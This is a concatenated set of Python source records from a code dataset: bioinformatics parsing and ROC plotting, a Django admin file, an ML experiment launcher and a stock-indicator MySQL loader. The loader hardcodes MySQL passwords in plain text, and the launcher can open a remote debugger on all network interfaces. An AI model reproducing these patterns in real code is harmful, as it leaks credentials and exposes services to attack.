tsv_path, 'w')\n for k in openi:\n k = k.rstrip()\n if k.startswith(\"chr\\tstart\"):\n b_file.write(k + \"\\n\")\n if \"B\" in k:\n b_file.write(k + \"\\n\")\n openi.close()\n b_file.close()\n\ndef main():\n dir_path = \"/home/callsobing/dream10/data/ChIPseq/label/\"\n out_path = \"/home/callsobing/dream10/process/ChIP-seq/label/\"\n for i in os.listdir(dir_path):\n if i.endswith(\".tsv\"):\n parse_binding_site(i, dir_path, out_path)\n\n\nif __name__ == '__main__':\n main()","sub_path":"parse_all_bind_site.py","file_name":"parse_all_bind_site.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"360103892","text":"#!/usr/bin/env python3\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport matplotlib\nimport os\n\n\n# plotting constants\nPERCENTILE_CATEGORIES = [20, 50, 70, 90]\nCOLOR_CATEGORIES = [\"#000033\", \"#000099\", \"#0000ff\", \"#6666ff\"]\nPERCENTILE_TICKS = [0, 20, 40, 60, 80, 100]\nGRID_ALPHA = 0.2\nLINE_ALPHA = 0.1\nMARKER_ALPHA = 0.6\nTITLE_FONT = 16\nAXIS_FONT = 14\nMAIN_FONT = 12\nLABEL_FONT = 10\nMAIN_COLOR = 'k'\nSECONDARY_COLOR = \"r\"\nMAIN_LINEWIDTH = 1\nMARKER_SIZE = 2\nBAR_WIDTH = 0.85\nHISTOGRAM_BINS = 50\nPNG_DPI = 300\n\n\ndef initialize_plot_style():\n \"\"\"\n Set matplotlib visual style\n Returns: None\n\n \"\"\"\n matplotlib.style.use('ggplot')\n plt.rcParams['lines.linewidth'] = MAIN_LINEWIDTH\n plt.rcParams['axes.facecolor'] = 'w'\n plt.rcParams['xtick.color'] = MAIN_COLOR\n plt.rc('xtick', labelsize=LABEL_FONT)\n plt.rc('ytick', labelsize=LABEL_FONT)\n\n\ndef load_host_links(filename):\n print(f\"Loading data from {filename}\")\n data = dict()\n with open(filename) as input:\n for i, line in enumerate(input):\n cut = line.strip().split(\"\\t\")\n if i == 0:\n if cut[0] != \"mobile_contig_name\" or \\\n cut[5] != \"cluster_name\" or \\\n cut[14] != \"mobile_element_copies_per_cell\":\n raise ImportError(\"not a good master table\")\n continue\n virus = cut[0]\n bacteria = cut[5]\n copy_count = float(cut[14])\n adjusted_inter_vs_intra_ratio = float(cut[16])\n if adjusted_inter_vs_intra_ratio < 0.1:\n continue\n if virus not in data:\n data[virus] = list()\n data[virus].append(copy_count)\n return 
data\n\n\ndef load_validation(filename):\n print(f\"Loading data from {filename}\")\n data = dict()\n with open(filename) as input:\n for i, line in enumerate(input):\n cut = line.strip().split(\"\\t\")\n if i == 0:\n continue\n threshold = float(cut[0])\n support = float(cut[-1])\n data[threshold] = support\n return data\n\n\ndef categorize_data_for_roc_analysis(host_data, min_value, max_value, increment):\n \"\"\"\n Go over and generate copy count threshold values and store the number of links kept at each cut off point\n Args:\n host_data (dict)\n min_value (float): lowest value to test as threshold\n max_value (float): highest value to test as threshold\n increment (float): multiplier to use for incrementing threshold\n Returns:\n roc_data (dict[float:list]): host hits remaining at each copy count threshold\n threshold_values (list[float]): copy count threshold generated\n\n \"\"\"\n print(\"Generating ROC categories\")\n roc_data = dict()\n threshold_values = list()\n threshold = min_value\n while threshold < max_value:\n roc_data[threshold] = [0, set()]\n threshold_values.append(threshold)\n threshold *= increment\n for mobile_contig, copy_counts in host_data.items():\n for copy_count in copy_counts:\n for threshold in threshold_values:\n if threshold > copy_count:\n break\n roc_data[threshold][0] += 1\n roc_data[threshold][1].add(mobile_contig)\n for threshold in threshold_values:\n roc_data[threshold][1] = len(roc_data[threshold][1])\n return roc_data, threshold_values\n\n\ndef generate_roc_curve_values(roc_data, threshold_values, min_value):\n \"\"\"\n Generate the x and y values of the copy count thresholding ROC curve\n Args:\n roc_data (dict[float:list]): host hits remaining at each copy count threshold\n threshold_values (list[float]): copy count threshold generated\n min_value (float): lowest value to test as threshold\n Returns:\n true_positives (list[float]): y-axis values of ROC curve\n false_positives: (list[float]): x-axis values of ROC curve\n\n \"\"\"\n print(\"Generating ROC curve\")\n true_positives = list()\n false_positives = list()\n max_possible_hits_accepted = roc_data[min_value][0]\n max_possible_mobile_contigs_with_hosts = roc_data[min_value][1]\n for threshold in threshold_values:\n hits_accepted = roc_data[threshold][0]\n false_positives.append(hits_accepted / max_possible_hits_accepted)\n mobile_contigs_with_hosts = roc_data[threshold][1]\n true_positives.append(mobile_contigs_with_hosts / max_possible_mobile_contigs_with_hosts)\n return true_positives, false_positives\n\n\ndef calculate_area_under_curve(false_positives, true_positives):\n \"\"\"\n Calculate the area under a ROC curve\n Args:\n false_positives (list): x-values of a ROC curve\n true_positives (list): y-values of a ROC curve\n Returns:\n auc (float): area under the curve\n\n \"\"\"\n print(\"Calculating AUC\")\n auc = 0\n for i, false_positive in enumerate(false_positives):\n if i + 1 == len(false_positives):\n break\n x_delta = false_positives[i] - false_positives[i + 1]\n height = (true_positives[i] + true_positives[i + 1]) / 2\n auc += x_delta * height\n print(f\"ROC area under curve = {auc}\")\n return auc\n\n\ndef get_optimal_threshold(threshold_values, true_positives, false_positives, min_fraction_without_hosts=0.8):\n \"\"\"\n Run down the ROC curve and stop when the optimal threshold has been reached\n Args:\n threshold_values (list[float]): copy count threshold generated\n true_positives (list[float]): y-axis values of ROC curve\n false_positives: (list[float]): x-axis values of ROC 
curve\n min_fraction_without_hosts (float): lowest acceptable fraction of mobile elements still with a host\n Returns:\n optimal_threshold (float): the optimal copy count value\n fp_rate (float): the x-value on the ROC curve of the optimal cut-off\n tp_rate (float): the y-value on the ROC curve of the optimal cut-off\n\n \"\"\"\n print(\"Calculating optimal threshold\")\n optimal_threshold = 0\n fp_rate = 0\n tp_rate = 0\n for i, threshold in enumerate(threshold_values):\n optimal_threshold = threshold\n fp_rate = false_positives[i]\n tp_rate = true_positives[i]\n if fp_rate + tp_rate < 1 or tp_rate < min_fraction_without_hosts:\n break\n print(f\"Optimal value = {optimal_threshold}\")\n return optimal_threshold, fp_rate, tp_rate\n\n\ndef plot_roc_curve(ax, true_positives, false_positives, fp_rate=1, tp_rate=1, optimal_threshold=None, auc=None):\n print(f\"Drawing ROC curve\")\n ax.plot(false_positives, true_positives, c=\"k\", alpha=0.3)\n ax.scatter(false_positives, true_positives, c=\"k\", alpha=0.6)\n ax.scatter([fp_rate], [tp_rate], c=\"r\")\n ax.plot([0, 1], [1, 0], \"--\", c=\"r\", alpha=0.5)\n ax.set_xlim(-0.01, 1.01)\n ax.set_ylim(-0.01, 1.01)\n ax.set_xlabel(\"Fraction of all hits kept\")\n ax.set_ylabel(\"Fraction of viruses with one host\")\n if auc is not None:\n auc = round(auc, 2)\n optimal_threshold = round(optimal_threshold, 2)\n ax.text(0.25, 0.78, f\"Chosen threshold\\n(0.14 copies per cell)\", c=\"r\")\n ax.grid(axis=\"both\", ls=\"--\", alpha=0.1, c=\"k\", which=\"major\")\n\n\ndef plot_host_validation(ax, prophage_validation, color=\"k\", label=None):\n xs = list()\n ys = list()\n chosen_validation = 0\n for x, y in prophage_validation.items():\n xs.append(x)\n ys.append(y)\n if x == 0.14:\n chosen_validation = y\n ys = [x for y, x in sorted(zip(xs, ys), reverse=True)]\n xs.sort(reverse=True)\n ax.plot(xs, ys, c=color, alpha=0.3)\n ax.axvline(0.14, linestyle=\"--\", c=\"r\", alpha=0.4)\n ax.scatter(xs, ys, c=color, alpha=0.6, label=label)\n ax.scatter([0.14], [chosen_validation], c=\"r\")\n\n ax.set_xlim(-0.01, 1.01)\n ax.set_ylim(-1, 101)\n ax.set_xlabel(\"Minimum copy count threshold\")\n ax.set_ylabel(\"Percent validated prophage hosts\")\n ax.text(0.17, 70, f\"Chosen threshold\\n(0.14 copies per cell)\", c=\"r\")\n ax.grid(axis=\"both\", ls=\"--\", alpha=0.1, c=\"k\", which=\"major\")\n\n\n\ndef load_rarefaction_data(directory):\n master_data = dict()\n for filename in os.listdir(directory):\n path = os.path.join(directory, filename)\n read_ct = int(filename.split(\".\")[0].split(\"_\")[-1])\n data = load_host_links_all(path)\n master_data[read_ct] = data\n return master_data\n\n\ndef load_host_links_all(filename):\n print(f\"Loading data from {filename}\")\n data = dict()\n with open(filename) as input:\n for i, line in enumerate(input):\n cut = line.strip().split(\"\\t\")\n if i == 0:\n if cut[0] != \"mobile_contig_name\" or \\\n cut[5] != \"cluster_name\" or \\\n cut[14] != \"mobile_element_copies_per_cell\":\n raise ImportError(\"not a good master table\")\n continue\n virus = cut[0]\n viral_depth = float(cut[3])\n bacteria = cut[5]\n intra_links = float(cut[9])\n inter_links = float(cut[11])\n if inter_links < 5 or intra_links < 10:\n continue\n links = int(cut[11])\n host_depth = float(cut[8])\n norm_links = (links / host_depth) / viral_depth\n copy_count = float(cut[14])\n adjusted_inter_vs_intra_ratio = float(cut[16])\n if virus not in data:\n data[virus] = dict()\n data[virus][bacteria] = (links, norm_links, copy_count, adjusted_inter_vs_intra_ratio)\n 
return data\n\n\ndef get_contig_host_pool(master_data, min_count=4, max_to_plot=10):\n contig_host_pool = dict()\n for data in master_data.values():\n for virus, subdata in data.items():\n for host in subdata:\n contig_host = f\"{virus}:{host}\"\n if contig_host not in contig_host_pool:\n contig_host_pool[contig_host] = 0\n contig_host_pool[contig_host] += 1\n filtered_contig_host_pool = set()\n for contig_host, count in contig_host_pool.items():\n if len(filtered_contig_host_pool) > max_to_plot:\n break\n if count >= min_count:\n filtered_contig_host_pool.add(contig_host)\n print(f\"Kept {len(filtered_contig_host_pool)} out of {len(contig_host_pool)} virus:host links for plotting\")\n return filtered_contig_host_pool\n\n\ndef plot_data(contig_host_pool, master_data, n, ax):\n print(f\"plotting value {n}\")\n for i, contig_host in enumerate(contig_host_pool):\n if i % 1000 == 0 and i > 0:\n print(f\"processed {i} links\")\n virus = contig_host.split(\":\")[0]\n host = contig_host.split(\":\")[1]\n xs = list()\n ys = list()\n for read_ct, data in master_data.items():\n if virus not in data:\n continue\n if host not in data[virus]:\n continue\n value = data[virus][host][n]\n xs.append(read_ct)\n ys.append(value)\n ys = [x for y, x in sorted(zip(xs, ys), reverse=True)]\n xs.sort(reverse=True)\n ax.plot(xs, ys, \"-\", c=\"k\", alpha=0.03)\n # ax.plot(xs, ys, \"o\", c=\"k\", alpha=0.05, markersize=1)\n\n\ndef make_histogram_table(contig_host_pool, master_data, n):\n print(f\"making histogram data for value {n}\")\n bins = 50\n st = 0\n fi = 2\n bin_size = (fi - st) / bins\n\n xs = list()\n ys = list()\n x = st\n while x <= fi:\n read_ct = max(master_data.keys())\n data = master_data[read_ct]\n count = 0\n for i, contig_host in enumerate(contig_host_pool):\n if i % 1000 == 0 and i > 0:\n print(f\"processed {i} links\")\n virus = contig_host.split(\":\")[0]\n host = contig_host.split(\":\")[1]\n value = data[virus][host][n]\n if x <= value < x + bin_size:\n count += 1\n xs.append(x)\n ys.append(count)\n x += bin_size\n for i, x in enumerate(xs):\n y = ys[i]\n print(x, y, sep=\"\\t\")\n\n\ndef main():\n master_data = load_rarefaction_data(\"rarefaction_data\")\n contig_host_pool = get_contig_host_pool(master_data, min_count=1, max_to_plot=10000)\n\n host_data = load_host_links(\"unfiltered_master_table.tsv\")\n all_prophage_validation = load_validation(\"validation_values_all_prophages.tsv\")\n single_host_prophage_validation = load_validation(\"validation_values_singlehost_prophages.tsv\")\n\n min_value = 0.0001\n roc_data, threshold_values = categorize_data_for_roc_analysis(host_data, min_value, 1000, 1.1)\n true_positives, false_positives = generate_roc_curve_values(roc_data, threshold_values, min_value)\n auc = calculate_area_under_curve(false_positives, true_positives)\n optimal_threshold, fp_rate, tp_rate = get_optimal_threshold(threshold_values, true_positives, false_positives)\n\n print(\"plotting subplots\")\n fig = plt.figure(figsize=(15, 5.4))\n initialize_plot_style()\n gs = gridspec.GridSpec(nrows=2, ncols=3, figure=fig)\n ax1 = fig.add_subplot(gs[0, 0])\n plt.gca().invert_xaxis()\n ax2 = fig.add_subplot(gs[1, 0])\n plt.gca().invert_xaxis()\n ax3 = fig.add_subplot(gs[:, 1])\n ax4 = fig.add_subplot(gs[:, 2])\n\n #########################\n for i, ax in enumerate([ax1, ax2]):\n ax.set_xscale(\"log\")\n plot_data(contig_host_pool, master_data, i + 2, ax)\n ax.set_xlim(105000000, 95000)\n ax.grid(axis=\"both\", ls=\"--\", alpha=0.1, c=\"k\", which=\"major\")\n ax.set_ylim(-0.05, 3.05)\n 
ax2.set_xlabel(\"Hi-C library size (read count)\")\n ax1.set_ylabel(\"Copies per cell\")\n ax2.set_ylabel(\"Connectivity ratio (R')\")\n\n #########################\n plot_roc_curve(ax3, true_positives, false_positives, fp_rate=fp_rate, tp_rate=tp_rate,\n optimal_threshold=optimal_threshold, auc=auc)\n plot_host_validation(ax4, all_prophage_validation, label=\"All prophages\")\n plot_host_validation(ax4, single_host_prophage_validation, color=\"b\", label=\"Single-host prophages\")\n\n ax1.set_title(\"A\", fontsize=20, x=-0.1)\n ax2.set_title(\"B\", fontsize=20, x=-0.1, y=1.05)\n ax3.set_title(\"C\", fontsize=20, x=-0.1)\n ax4.set_title(\"D\", fontsize=20, x=-0.1)\n plt.tight_layout()\n plt.savefig(\"figure.png\", dpi=300)\n\n\nmain()\n","sub_path":"figures/figure_roc_curve/draw.py","file_name":"draw.py","file_ext":"py","file_size_in_byte":14349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"552792675","text":"from django.contrib import admin\nfrom tpo.app.models import UserProfile, Company\n\n\nclass UserProfileAdmin(admin.ModelAdmin):\n fields = ('name', 'username', 'email',)\n\n\nclass CompanyAdmin(admin.ModelAdmin):\n search_fields = ('name', 'tpr__name', 'tpr__email', 'tpr__username')\n list_display = ('name', 'tpr',)\n list_filter = ('type_of_company',)\n\n\nadmin.site.register(UserProfile, UserProfileAdmin)\nadmin.site.register(Company, CompanyAdmin)\n","sub_path":"tpo/app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"115907838","text":"import re\r\n\r\n# Import txt, split the text file\r\nfilename = \"/Users/amitmin/Documents/research/dataParsing/phosphatase2.txt\"\r\ninfile = open(filename, 'r')\r\nlines = infile.readlines()\r\n#kinaseID and branchCoords\r\nlines2 = lines[10016:12152]\r\n#nodeX and nodeY values\r\nlines3 = lines[9813:10015]\r\n#textX and textY values\r\nlines4 = lines[12153:12355]\r\n# Dictionaries\r\n\r\nkinase = {}\r\n\r\npatternPath = re.compile('F_(.*?)\"')\r\nfor line in lines2:\r\n\tif re.match(r'\\t', line):\r\n\t\tif re.search(patternPath, line):\r\n\t\t\t# Make sure to use the join method to convert the returned List from findall into a string\r\n\t\t\tkinaseID = ''.join(re.findall(patternPath, line))\r\n\t\t\tif kinaseID[len(kinaseID) - 1] == \"_\":\r\n\t\t\t\tkinaseID = kinaseID[:-3]\r\n\t\t\tkinase[kinaseID] = {'pathID': kinaseID}\r\n\r\n\r\n\r\n# Parse branchCoords into the dictionary - Sloppy b/c coords span several lines\r\npatternPath2 = re.compile(r' d=\"(.*?)$')\r\npatternPath3 = re.compile(r'(?<=\\t\\t)(.*?)$')\r\ncoordBuilder = \"\"\r\n# old and new is necessary to make my parse work for the first kinase ID\r\noldID = \"\"\r\nnewID = \"\"\r\nfor line in lines2:\r\n\tif re.match(r'\\t 0:\n # make sure each complete iteration has gone through and easy for debug\n variants[i][\"runner_kwargs\"][\"pretrain_optim_epochs\"] = 5\n variants[i][\"runner_kwargs\"][\"max_optim_epochs\"] = 5\n variants[i][\"runner_kwargs\"][\"eval_interval\"] = 2\n variants[i][\"runner_kwargs\"][\"log_interval\"] = 4\n variants[i][\"pretrain_dataloader_kwargs\"][\"shuffle\"] = False\n variants[i][\"dataloader_kwargs\"][\"shuffle\"] = False\n variants[i][\"pretrain_dataloader_kwargs\"][\"num_workers\"] = 0\n variants[i][\"dataloader_kwargs\"][\"num_workers\"] = 0\n variants[i][\"eval_dataloader_kwargs\"][\"num_workers\"] = 0\n variants[i][\"random_subset_kwargs\"][\"subset_len\"] = 2\n 
\n run_experiments(\n script=\"vos/experiments/videoSeg.py\",\n affinity_code=affinity_code,\n experiment_title=experiment_title+(\"--debug\" if args.debug else \"\"),\n runs_per_setting=1,\n variants=variants,\n log_dirs=log_dirs,\n debug_mode=args.debug,\n )\n\nif __name__ == \"__main__\":\n import argparse\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n '--debug', help= 'A common setting of whether to entering debug mode for remote attach',\n type= int, default= 0,\n )\n\n args = parser.parse_args()\n if args.debug > 0:\n # configuration for remote attach and debug\n import ptvsd\n import sys\n ip_address = ('0.0.0.0', 5050)\n print(\"Process: \" + \" \".join(sys.argv[:]))\n print(\"Is waiting for attach at address: %s:%d\" % ip_address, flush= True)\n # Allow other computers to attach to ptvsd at this IP address and port.\n ptvsd.enable_attach(address=ip_address,)\n # Pause the program until a remote debugger is attached\n ptvsd.wait_for_attach()\n print(\"Process attached, start running into experiment...\", flush= True)\n ptvsd.break_into_debugger()\n\n main(args)\n","sub_path":"vos/experiments/launch_maintrain_vos.py","file_name":"launch_maintrain_vos.py","file_ext":"py","file_size_in_byte":4097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"281666533","text":"# def bubble_sort(l):\n# length = len(l)\n# for i in range(length):\n# try:\n# for j in range(length-i):\n# if l[j] > l[j+1]:\n# tmp = l[j+1]\n# l[j+1] = l[j]\n# l[j] = tmp\n# except IndexError:\n# pass\n#\n# return l\n\n#变量其实是地址 # 101011100111101011 #逻辑地址 -->物理地址 01111110001100\nimport datetime\n\ndef get_time():\n return datetime.time()\n\ndef f2():\n now = get_time()\n\ndef select_sort(l):\n\n now = get_time()\n\n length = len(l)\n for i in range(length):\n little = l[i]\n min_index = i+1\n for j in range(i+1,length):\n if l[j] < l[min_index]:\n min_index = j\n try:\n if l[min_index] < little:\n tmp = little\n l[i] = l[min_index]\n l[min_index] = tmp\n except IndexError:\n pass\n\n return l\n\n\n\n\n\n\n\na1 = [1,2,10,3,4,5,9,56,6,7,134,9]\n\n# print(select_sort(a1))\n\n\ndef muti_seli():\n sql = 'select 1;'\n sql2 = 'select 2;'\n\n\nx = None\nx12 = 'None'\n\n\nstr1 = \"\\\\r\"\n\nprint(str1)\n\nprint('-------')","sub_path":"rimi_linux_mysql/speach/bubble.py","file_name":"bubble.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"105105068","text":"#coding=utf-8\r\n#!/home/pi/miniconda3/envs/py36/bin/python\r\n\r\nfrom datetime import datetime\r\nimport pandas as pd\r\nimport re\r\nimport numpy as np\r\nfrom sqlalchemy import create_engine\r\nimport mysql.connector\r\nimport re\r\nimport csv\r\nimport time\r\nimport shutil\r\nimport os\r\nimport io\r\nfrom pandas import isnull\r\nfrom glob import glob\r\n\r\n# ip = '182.155.205.224'\r\n\r\nip = '127.0.0.1'\r\n\r\n# engine = create_engine( \"mysql+mysqldb://root:28wC75#D@127.0.0.1/StockDB?charset=utf8\" )\r\n\r\nenginePi = create_engine( 'mysql+mysqlconnector://pregaine:RF69xy7C@{}/mysql?charset=utf8'.format( ip ) )\r\n\r\ndef StrToDateFormat( data, val ):\r\n # print( 'data {}, val {}'.format( data, val ) )\r\n \r\n dt = datetime.strptime( val, '%y%m%d' )\r\n val = dt.strftime( \"%y-%m-%d\" )\r\n\r\n return val\r\n\r\n\r\nclass DB_TechAnalysis:\r\n\r\n def __init__( self, server, database, username, password ):\r\n\r\n self.df = pd.DataFrame( )\r\n self.src_df = pd.DataFrame( )\r\n\r\n self.d = { '月': 
'TECH_M' }\r\n\r\n self.datelst = [ ]\r\n print( \"Initial Database connection...\" + database )\r\n self.dbname = database\r\n \r\n self.con_db = mysql.connector.connect( host = server,\r\n user = username,\r\n passwd = password,\r\n database = database,\r\n charset = \"utf8\"\r\n )\r\n \r\n self.cur_db = self.con_db.cursor( buffered = True )\r\n self.con_db.commit( )\r\n\r\n # TODO 如何查當下SQL 語言及時間格式\r\n # cmd = \"\"\"SET LANGUAGE us_english; set dateformat ymd;\"\"\"\r\n # self.cur_db.execute( cmd )\r\n\r\n self.stock = ''\r\n self.date = ''\r\n\r\n def ResetTable( self, data ):\r\n\r\n d = dict( 分 = 'DROP TABLE IF EXISTS TECH_H', \r\n 日 = 'DROP TABLE IF EXISTS TECH_D',\r\n 周 = 'DROP TABLE IF EXISTS TECH_W', \r\n 月 = 'DROP TABLE IF EXISTS TECH_M' )\r\n\r\n # Do some setup\r\n self.cur_db.execute( d[ data ] )\r\n \r\n print( 'Successfully Deleter ' + data )\r\n\r\n def CreateTable( self, data ):\r\n\r\n \r\n sql_m_cmd = '''\r\n CREATE TABLE mysql.TECH_M \r\n (\r\n stock varchar( 10 ) COLLATE utf8_bin NOT NULL,\r\n date DATE NOT NULL,\r\n \r\n open_price decimal(10, 2) NULL,\r\n high_price decimal(10, 2) NULL,\r\n low_price decimal(10, 2) NULL,\r\n close_price decimal(10, 2) NULL,\r\n volume bigint NULL,\r\n \r\n ma3 decimal(10, 2) NULL,\r\n ma6 decimal(10, 2) NULL,\r\n ma12 decimal(10, 2) NULL,\r\n ma24 decimal(10, 2) NULL,\r\n ma36 decimal(10, 2) NULL,\r\n ma60 decimal(10, 2) NULL,\r\n ma120 decimal(10, 2) NULL,\r\n \r\n rsi2 decimal(10, 2) NULL,\r\n rsi5 decimal(10, 2) NULL,\r\n rsi10 decimal(10, 2) NULL,\r\n \r\n k9_3 decimal(10, 2) NULL,\r\n d9_3 decimal(10, 2) NULL,\r\n k3_2 decimal(10, 2) NULL,\r\n d3_3 decimal(10, 2) NULL,\r\n \r\n mfi4 decimal(10, 2) NULL,\r\n mfi6 decimal(10, 2) NULL,\r\n mfi14 decimal(10, 2) NULL,\r\n\r\n macd_dif_6 decimal(10, 2) NULL,\r\n dem_12 decimal(10, 2) NULL,\r\n osc_6_12_9 decimal(10, 2) NULL,\r\n\r\n macd_dif_12 decimal(10, 2) NULL,\r\n dem_26 decimal(10, 2) NULL,\r\n osc6_12_26_9 decimal(10, 2) NULL,\r\n\r\n willr9 decimal(10, 2) NULL,\r\n willr18 decimal(10, 2) NULL,\r\n willr42 decimal(10, 2) NULL,\r\n willr14 decimal(10, 2) NULL,\r\n willr24 decimal(10, 2) NULL,\r\n willr56 decimal(10, 2) NULL,\r\n willr72 decimal(10, 2) NULL,\r\n \r\n plus_di decimal(10, 2) NULL,\r\n minus_di decimal(10, 2) NULL,\r\n dx decimal(10, 2) NULL,\r\n adx decimal(10, 2) NULL,\r\n upperband decimal(10, 2) NULL,\r\n middleband decimal(10, 2) NULL,\r\n dnperband decimal(10, 2) NULL,\r\n bb decimal(10, 2) NULL,\r\n w20 decimal(10, 2) NULL,\r\n bias20 decimal(10, 2) NULL,\r\n bias60 decimal(10, 2) NULL,\r\n\r\n INDEX name ( stock, date ),\r\n INDEX idx_stock ( stock ),\r\n INDEX idx_date ( date )\r\n\r\n )\r\n '''\r\n\r\n table_d = { '月': sql_m_cmd }\r\n\r\n self.cur_db.execute( table_d[ data ] )\r\n \r\n print( 'Successfully Create 技術指標 ' + data )\r\n\r\n def CompareDB( self, data ):\r\n \r\n # print( table_name, stock_num )\r\n \r\n cmd = 'SELECT date, volume FROM {0} WHERE stock = \\'{1}\\''.format( self.d[ data ], self.stock )\r\n \r\n self.cur_db.execute( cmd )\r\n \r\n ft = self.cur_db.fetchall( )\r\n \r\n lst = [ ]\r\n\r\n for val in ft:\r\n \r\n date = val[ 0 ].strftime( '%y%m%d' )\r\n\r\n volume = val[ 1 ]\r\n \r\n lst.append( ( date, volume ) )\r\n\r\n df = pd.DataFrame( lst, columns = [ '日期', '成交量_資料庫取出' ] )\r\n # print( df.head( 5 ) )\r\n left = pd.merge( self.df, df, on = [ '日期' ], how = 'left' )\r\n left = left[ left[ '成交量_資料庫取出' ] != left[ '成交量' ] ]\r\n del left[ '成交量_資料庫取出' ]\r\n \r\n self.df = left \r\n \r\n for index, row in self.df.iterrows( ):\r\n # print( 
self.stock, row[ '日期' ] )\r\n self.FindDuplicate( row[ '日期' ] )\r\n \r\n # print( data, '刪除重覆寫入' )\r\n # print( self.df )\r\n\r\n def ReadCSV( self, file ):\r\n \r\n self.df = pd.read_csv( file, \r\n sep = ',', \r\n encoding = 'utf8', \r\n false_values = 'NA', \r\n dtype = { '日期': str } )\r\n \r\n self.df = self.df.replace( [ np.inf, -np.inf ], np.nan ) \r\n \r\n # self.df = self.df[ : 20 ]\r\n # self.df[ '日期' ] = pd.to_datetime( self.df[ '日期' ], format = \"%y%m%d\" ) \r\n # print( self.df )\r\n\r\n def FindDuplicate( self, data ):\r\n\r\n # 尋找重覆資料\r\n cmd = 'SELECT stock, date from mysql.TECH_M where stock = \\'{}\\' and date = \\'{}\\';'.format( self.stock, data )\r\n \r\n # print( cmd )\r\n \r\n self.cur_db.execute( cmd )\r\n \r\n ft = self.cur_db.fetchone( )\r\n \r\n # print( '比對資料庫{0:>10} {1}'.format( self.stock, data ) )\r\n\r\n if ft is not None:\r\n \r\n cmd = '''DELETE FROM mysql.TECH_M where stock = \\'{}\\' and date = \\'{}\\';'''.format( self.stock, data )\r\n \r\n # print( cmd )\r\n \r\n self.cur_db.execute( cmd )\r\n \r\n print( '刪除重覆資料{0:>10} {1}'.format( self.stock, data ) )\r\n \r\n self.con_db.commit( )\r\n\r\n '''\r\n # 尋找重覆資料\r\n # cmd = 'SELECT stock, date from mysql.TECH_W WHERE stock = \\'{}\\' and date = \\'{}\\';'.format( self.stock, data )\r\n \r\n # print( cmd )\r\n \r\n self.cur_db.execute( cmd )\r\n \r\n ft = self.cur_db.fetchone( )\r\n \r\n # print( '比對資料庫{0:>10} {1}'.format( self.stock, data ) )\r\n\r\n if ft is not None:\r\n \r\n cmd = 'DELETE FROM mysql.TECH_W WHERE stock = \\'{}\\' and date = \\'{}\\';'.format( self.stock, data )\r\n \r\n # print( cmd )\r\n \r\n self.cur_db.execute( cmd )\r\n \r\n print( '刪除重覆資料{0:>10} {1}'.format( self.stock, data ) )\r\n \r\n self.con_db.commit( )\r\n '''\r\n\r\n def WriteDB( self, data ):\r\n \r\n \r\n '''\r\n self.df = self.df.astype( object ).where( pd.notnull( self.df ), None )\r\n\r\n lst = self.df.values.tolist( )\r\n\r\n if len( lst ) == 0:\r\n # print( '資料庫比對CSV無新資料 {}'.format( self.stock ) )\r\n return\r\n \r\n columns = [ 'stock', 'date', 'open_price', 'high_price ', 'low_price', 'close_price', 'volume',\r\n 'ma4', 'ma12', 'ma24', 'ma48', 'ma96', 'ma144', 'ma240', 'ma480', 'rsi2', 'rsi3',\r\n 'rsi4', 'rsi5', 'rsi10', 'k9_3', 'd9_3', 'k3_2', 'd3_3', 'mfi4', 'mfi6', 'mfi14',\r\n 'macd_dif_6', 'dem_12', 'osc_6_12_9', 'macd_dif_12', 'dem_26', 'osc6_12_26_9', 'willr9',\r\n 'willr18', 'willr42', 'willr14', 'willr24', 'willr56', 'willr72', 'plus_di', 'minus_di',\r\n 'dx', 'adx', 'upperband', 'middleband', 'dnperband', 'bb', 'w20', 'bias20', 'bias60' ]\r\n \r\n lenVal = len( columns )\r\n \r\n var_string = ','.join( [ '%s' ] * lenVal )\r\n \r\n for val in lst:\r\n \r\n val[ 0 ] = self.stock\r\n \r\n # print( val ) \r\n # exit()\r\n \r\n # dt = datetime.strptime( val[ 1 ], '%y%m%d' )\r\n # val[ 1 ] = dt.strftime( \"%y-%m-%d\" )\r\n \r\n query_string = 'INSERT INTO mysql.TECH_W VALUES ( {} );'.format( var_string )\r\n\r\n # print( query_string )\r\n # print( '取出{}'.format( val ) )\r\n \r\n self.cur_db.execute( query_string, val )\r\n \r\n print( '寫入資料庫 {} {}'.format( val[ 0 ], val[ 1 ] ) )\r\n \r\n ''' \r\n \r\n \r\n self.df = self.df.astype( object ).where( pd.notnull( self.df ), None )\r\n\r\n if self.df.empty:\r\n # print( '{:<7}exist DB'.format( self.stock ) )\r\n return\r\n\r\n del self.df[ 'Unnamed: 0' ]\r\n self.df.insert( 0, 'stock', self.stock )\r\n\r\n # self.df[ '日期' ] = pd.to_datetime( self.df[ '日期' ], format = '%y%m%d' )\r\n # self.df[ '日期' ] = self.df[ '日期' ].dt.strftime( \"%y-%m-%d\" )\r\n\r\n # print( 
self.df, self.d[ data ] )\r\n\r\n \r\n self.df.columns = [ 'stock', 'date', 'open_price', 'high_price', 'low_price', 'close_price', 'volume',\r\n 'ma3', 'ma6', 'ma12', 'ma24', 'ma36', 'ma60', 'ma120',\r\n 'rsi2', 'rsi5', 'rsi10', \r\n 'k9_3', 'd9_3', 'k3_2', 'd3_3', \r\n 'mfi4', 'mfi6', 'mfi14',\r\n 'macd_dif_6', 'dem_12', 'osc_6_12_9', 'macd_dif_12', 'dem_26', 'osc6_12_26_9', \r\n 'willr9', 'willr18', 'willr42', 'willr14', 'willr24', 'willr56', 'willr72',\r\n 'plus_di', 'minus_di',\r\n 'dx', 'adx', 'upperband', 'middleband', 'dnperband', 'bb', 'w20', 'bias20', 'bias60' ]\r\n\r\n\r\n # Try to send it to the access database (and fail)\r\n self.df.to_sql( name = self.d[ data ], \r\n con = enginePi, \r\n index = False, \r\n if_exists = 'append', \r\n index_label = None )\r\n \r\n print( '寫入資料庫{0:>2}{1:>7} {2}'.format( data, self.stock, self.date ) )\r\n\r\ndef main( ):\r\n \r\n db_M = DB_TechAnalysis( 